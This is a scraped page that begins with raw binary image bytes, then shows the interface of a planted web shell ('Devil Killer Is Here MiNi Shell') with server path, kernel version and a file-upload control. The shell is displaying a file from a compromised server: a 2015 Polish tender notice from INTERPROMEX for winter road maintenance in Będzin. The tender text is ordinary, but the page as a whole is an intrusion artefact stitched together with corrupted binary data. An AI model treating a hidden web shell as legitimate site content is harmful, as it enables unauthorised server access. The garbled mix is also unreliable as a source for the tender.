JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151007/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151007/265344-N-2015.html

<p class="kh_header"><b>Będzin: Zimowe utrzymanie wyznaczonych dróg lokalno miejskich na terenie miasta Będzina w sezonie zimowym 2015</b><br>
<b>Numer ogłoszenia: 265344 - 2015; data zamieszczenia: 07.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Techniczno-Handlowo-Usługowe INTERPROMEX Spółka z o.o. , ul. Paryska 11, 42-500 Będzin, woj. śląskie, tel. 032 2675275 w. 29 267-55-15, faks 032 2673617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.interpromex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie wyznaczonych dróg lokalno miejskich na terenie miasta Będzina w sezonie zimowym 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zimowe utrzymanie dróg lokalno miejskich na terenie miasta Będzina.
Szczegółowa charakterystykę przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego - w wysokości 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust 1 pkt. 6 Ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w postępowaniu przetargowym o udzielenie zamówienia jest wniesienie przez Wykonawcę wadium w wysokości odpowiednio dla;

Zadania 1 -  4 600,00 zł (słownie: cztery tysiące sześćset zł)
Zadania 2 -  5 700,00 zł (słownie: pięć tysięcy siedemset zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w ciągu ostatnich trzech lat  przed terminem składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał lub wykonuje 
1   usługę  polegająca na zimowym utrzymaniu odcinków dróg o długości niemniejszej niż:
- dla Zadania 1 - 40km
- dla Zadania 2 - 50 km

W celu potwierdzenia ww. warunku należy przedstawić oświadczenie o spełnianiu warunków  udziału w postępowaniu oraz wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane. Dowody winny potwierdzać, że usługi (wykazane w wykazie) zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż  dysponuje bądź  będzie dysponował  odpowiednim potencjałem technicznym w celu realizacji zamówienia, tj.:
Dla realizacji zadania 1:
1. Samochód patrolowy do przeprowadzania objazdów i kontroli realizacji zamówienia - 1 szt
2. Koparko - ładowarka - 2 szt
3. Pługo - piaskarka - 3 szt
4. Ciągnik z pługiem i rozrzutnikiem - 2 szt
5. Pług wirnikowy - 1 szt
Dla realizacji zadania 2: 
1. Samochód patrolowy do przeprowadzania objazdów i kontroli realizacji zamówienia - 1 szt
2. Koparko - ładowarka - 2 szt
3. Pługo - piaskarka - 3 szt
4. Ciągnik z pługiem i rozrzutnikiem - 2 szt
5. Pług wirnikowy - 1 szt
UWAGA: Przy składaniu oferty na więcej niż jedno zadanie, Wykonawca musi wykazać dysponowanie 
( dysponuje lub będzie dysponował) sprzętem w ilości wynikającej z sumy ilości sprzętu dla poszczególnych zadań.
 Niespełnienie tego warunku spowoduje wykluczenie Wykonawcy z całego postępowania ( wszystkich zadań).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania niniejszego zamówienia, tj. minimum 2 osobami odpowiedzialnymi za świadczenie usług, posiadającymi doświadczenie (wymagane jest pełnienie funkcji dyspozytora w okresie co najmniej 1 sezonu zimowego) oraz kierowcami i operatorami urządzeń w ilości zapewniającej obsługę wymaganego w niniejszej specyfikacji sprzętu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 200 000,00 zł. tzn. musi posiadać opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
W przypadku składania oferty przez podmioty występujące wspólnie, spełnienie warunku oceniane jest łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.interpromex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Techniczno - Handlowo - Usługowe INTERPROMEX Spółka z  ograniczoną odpowiedzialnością.     
42 - 500 Będzin, ul. Paryska 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2015 godzina 09:45, miejsce: Przedsiębiorstwo Techniczno - Handlowo - Usługowe INTERPROMEX Spółka z  ograniczoną odpowiedzialnością.     
42 - 500 Będzin, ul. Paryska 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Zimowe utrzymanie dróg lokalno miejskich: Góra Zamkowa - Brzozowica, Ksawera - Koszelew, Małobądz - Górki Małobądzkie, Warpie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zimowe mechaniczne utrzymanie dróg, wykonywane będzie w terminie od 01 listopada 2015r. 
do 31 grudnia 2015r. Zimowe utrzymanie obejmuje:
a)	mechaniczne usuwanie śniegu i błota pośniegowego z dróg lokalno-miejskich na terenie miasta Będzina zgodnie z wykazem dróg dla Zadania 1.
b)	likwidację śliskości zimowej (gołoledzi, lodowicy) z dróg lokalno-miejskich za pomocą chlorku sodu, chlorku wapnia i piasku zgodnie z wykazem dróg dla Zadania 1 (częstotliwość może być ustalana przez Zamawiającego).
2.	Doba zimowego utrzymania dróg, chodników i miejsc wyznaczonych trwa od godz. 6:00 do godz. 6:00 dnia następnego.
3.	Wykonawca zobowiązany jest w okresie zimowym do przekazywania codziennych raportów (do godz. 700 każdego dnia za dzień poprzedni) określających prowadzenie akcji zimowej z wyszczególnieniem miejsc, które w czasie prowadzenia akcji były utrzymywane (wykaz dróg posypywanych i odpłużanych, oraz miejsc wyznaczonych posypywanych i odśnieżanych, krotności przejazdów, ilości użytych materiałów uszorstniających, godziny prowadzenia akcji) zgodnie z załącznikiem nr 1a  do SIWZ (wzór raportu dobowego).
4.	Wykonawca zobowiązany jest w okresie zimowym do pełnienia od dnia rozpoczęcia sezonu zimowego całodobowego dyżuru dyspozytorskiego w celu kierowania w ścisłej koordynacji z Zamawiającym pracami dotyczącymi usuwania skutków zimy.
5.	Wykonawca zobowiązany jest w okresie zimowym do zapewnienia ciągłej gotowości pozwalającej w sposób natychmiastowy, ze względu na zmieniające się warunki atmosferyczne prowadzić prace związane z zadaniami wynikającymi z zimowego utrzymania, przede wszystkim utrzymanie w sprawności technicznej wymaganego przez Zamawiającego sprzętu, oraz zapewnienie pełnego stanu osobowego pracowników koniecznych do realizacji tych zadań.
6.	Zamawiający wymaga, aby narzędzia i urządzenia wykorzystywane do zimowego utrzymania dróg wskazane w załączniku nr 10 do SIWZ użyte zostały  w pierwszej kolejności do zimowego utrzymania dróg Zamawiającego zgodnie z terminami określonymi w SIWZ. Po zakończeniu działań na rzecz Zamawiającego narzędzia i urządzenia mogą zostać wykorzystywane  do innych zadań Wykonawcy.
7.	Wykonawca musi dysponować osobami zdolnymi do udziału w realizacji zamówienia, które posiadają stosowne uprawnienia wymagane przepisami prawa. Wykonawca musi być dyspozycyjny i zgłaszać się na każde wezwanie Zamawiającego w celach związanych z realizację umowy (np. objazdy dróg, ustalanie rozliczeń). - załącznik 11 do SIWZ
8.	Wykonawca zobowiązany jest w okresie zimowym do dokonywania na każde wezwanie Zamawiającego wspólnych objazdów dróg celem oględzin stanu ich nawierzchni bez prawa domagania się dodatkowego wynagrodzenia (koszty powyższe Wykonawca winien skalkulować w cenie oferty).
9.	Wykonawca zobowiązany jest w okresie zimowym do przystąpienia do usuwania śniegu i likwidacji gołoledzi po wystąpieniu niekorzystnych warunków atmosferycznych bez zbędnej zwłoki (w ciągu 30 minut), przy czym wykonanie w/w czynności powinny zostać zakończone w następującym czasie:
a)	dla dróg I kolejności zimowego utrzymania - do 4 godz. po ustaniu opadów,
b)	dla dróg II kolejności zimowego utrzymania - do 6 godz. po ustaniu opadów.
10.	Wykonawca jest zobowiązany do natychmiastowego reagowania na każde zgłoszenie lub interwencję ze strony Zamawiającego.
11.	Ustala się następujące standardy zimowego utrzymania dróg:
a)	dla dróg I kolejności  II standard zimowego utrzymania,
b)	dla dróg II kolejności II standard zimowego utrzymania.
Wskazane standardy są tożsame (identyczne) jak w Zarządzeniu nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych.
12.	Technologia zimowego utrzymania dróg:
a)	Płużenie:
- pługiem pracującym pojedynczo - na drogach jednokierunkowych i dwukierunkowych szerokości jezdni 6 metrów i poniżej,
- pługami pracującymi w zespole po 2 lub 3 - drogi szerokości jezdni powyżej 6 metrów.
b) Posypywanie:
- solą drogową o gęstości posypywania 30 g-m2 dla  II - go standardu zimowego utrzymania,  przy czym dopuszcza się alternatywnie użycie soli drogowej zwilżanej solanką o gęstości posypywania 20  g-m2, przy temperaturze poniżej -10 0C dopuszcza się użycie materiałów uszorstniających,
13.	Utrzymanie odcinków dróg w rejonie przystanków komunikacji publicznej w taki sposób, aby zapewnić bezpieczne (bez możliwości poślizgu) hamowanie i ruszanie pojazdów, utrzymywanie zatok przystankowych w taki sposób aby możliwe było swobodne i bezpieczne wysiadanie i wsiadanie do pojazdów komunikacji miejskiej. Zatoka autobusowa stanowi część drogi i powinna być utrzymywana w standardzie drogi.
14.	Utrzymanie odcinków dróg zlokalizowanych w rejonach skrzyżowań i podjazdów (wzniesienia i spadki dróg) w taki sposób, aby zapewnić bezpieczne (bez możliwości poślizgu) hamowanie i ruszanie pojazdów.
15.	Wykonawca zobowiązany jest stosować do zapobiegania powstawaniu i likwidacji śliskości na drogach materiały z atestem wg obowiązujących przepisów (m.in. środków chemicznych spełniających Polskie Normy przenoszące normy europejskie lub przenoszące normy innych państw członkowskich Europejskiego Obszaru Gospodarczego - stosowania  odpowiednich dawek materiałów do usuwania śliskości zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005r. w sprawie rodzajów materiałów i warunków stosowania środków, jakie mogą być używane na drogach  publicznych oraz ulicach i placach ( Dz.U. z  2005r. Nr 230 poz.1960 ) i przedłożenia na żądanie Zamawiającego atestu dopuszczającego środki do ich stosowania.
16.	Wykonawca we własnym zakresie zapewnia materiały do wykonania zleconych zadań oraz pokrywa koszty związane z zakupem środków chemicznych, soli drogowej, piasku, solanki i innych materiałów niezbędnych do realizacji zadań.
17.	Obowiązkiem Wykonawcy jest przystąpienie do realizacji zadania w takim zakresie, by nie spowodować sytuacji zagrożenia bezpieczeństwa w stosunku do uczestników ruchu na drogach oraz ruchu pieszego. W przypadku zaniedbań Wykonawca ponosi odpowiedzialność materialną w stosunku do poszkodowanych.
18.	Wykonawca jest zobowiązany do wykonywania prac objętych zamówieniem zgodnie z obowiązującymi normami i technologiami, zasadami wiedzy technicznej oraz zgodnie z obowiązującymi przepisami prawa.
19.	Przy realizacji zimowego utrzymania Wykonawca może stosować inne niż piasek materiały do zwiększenia szorstkości jezdni tylko za zgodą Zamawiającego.
20.	Wykonawca jest zobowiązany do zabezpieczenia terenu podczas wykonywania prac, o ile będzie to wymagane obowiązującymi przepisami prawa.
21.	Sól do usuwania skutków zimy winna spełniać normę dla soli drogowej.
22.	Zimowe utrzymanie dróg, chodników i miejsc wyznaczonych polega na usuwaniu śniegu i śliskości niezależnie od grubości warstwy śniegu lub lodu zalegającej na utrzymywanym terenie.
23.	Zamawiający może dokonać korekt (dodać, odjąć) odcinków dróg objętych działaniami zimowego utrzymania w ilości ?20% na danym zadaniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szczegółowa charakterystyka przedmiotu zamówienia dla Zadania 2 - Zimowe utrzymanie dróg lokalno miejskich: Grodziec, Łagisza, Zamkowe - Gzichów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zimowe mechaniczne utrzymanie dróg, wykonywane będzie w terminie od 01 listopada 2015r. 
do 31 grudnia 2015r. Zimowe utrzymanie obejmuje:
a)	mechaniczne usuwanie śniegu i błota pośniegowego z dróg lokalno-miejskich na terenie miasta Będzina zgodnie z wykazem dróg dla Zadania 2.
b)	likwidację śliskości zimowej (gołoledzi, lodowicy) z dróg lokalno-miejskich za pomocą chlorku sodu, chlorku wapnia i piasku zgodnie z wykazem dróg dla Zadania 2 (częstotliwość może być ustalana przez Zamawiającego).
2.	Doba zimowego utrzymania dróg, chodników i miejsc wyznaczonych trwa od godz. 6:00 do godz. 6:00 dnia następnego.
